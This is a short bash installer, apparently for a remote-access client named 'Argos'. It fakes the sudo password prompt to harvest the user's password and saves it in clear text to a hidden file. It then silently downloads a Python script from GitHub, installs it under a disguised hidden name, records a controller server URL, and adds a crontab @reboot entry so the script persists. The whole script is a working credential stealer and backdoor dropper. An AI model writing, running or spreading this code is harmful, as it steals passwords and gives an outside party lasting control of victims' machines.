#!/bin/bash
if [ "$#" -ne 1 ]; then
    echo "First argument should be server url"
    exit 1
fi
urlbase=https://raw.githubusercontent.com/Just1truc
# Getting prompt :
message=$(echo "ok" | sudo -Sk echo $? 2>&1)
prompt=$(echo "$message" | cut -d : -f 1 | head -n 1):
error=$(echo "$message" | head -n 1 | cut -d : -f 2 | cut -b 2-)
# installing pip dependencies
while true
do
    read -p "$prompt " -sr password
    echo ""
    echo "$password" | sudo -Sk echo $? &> /dev/null
    output=$?
    if [ $output -eq 0 ]
    then
        echo "$password" | sudo -kS -p '' bash -c "echo '$password' > /usr/local/src/.server.exwrap_info.txt"
        break
    else
        echo "$error"
    fi
done
curl $urlbase/Argos/main/client/dependencies -o here.txt &> /dev/null
pip install -r here.txt &> /dev/null
rm here.txt
# installing script
curl $urlbase/Argos/main/client/connexion.py -o .service.exwrap.py &> /dev/null
echo "$(< /usr/local/src/.server.exwrap_info.txt)" | sudo -kS -p '' mv .service.exwrap.py /usr/local/src/.service.exwrap.py
# Setup url
echo "$(< /usr/local/src/.server.exwrap_info.txt)" | sudo -kS -p '' bash -c "echo $1 > /usr/local/src/.serverurl.exwrap"
# Setting up crontab
echo "@reboot python3 /usr/local/src/.service.exwrap.py" > crontb && crontab crontb && rm -rf crontb
python3 /usr/local/src/.service.exwrap.py &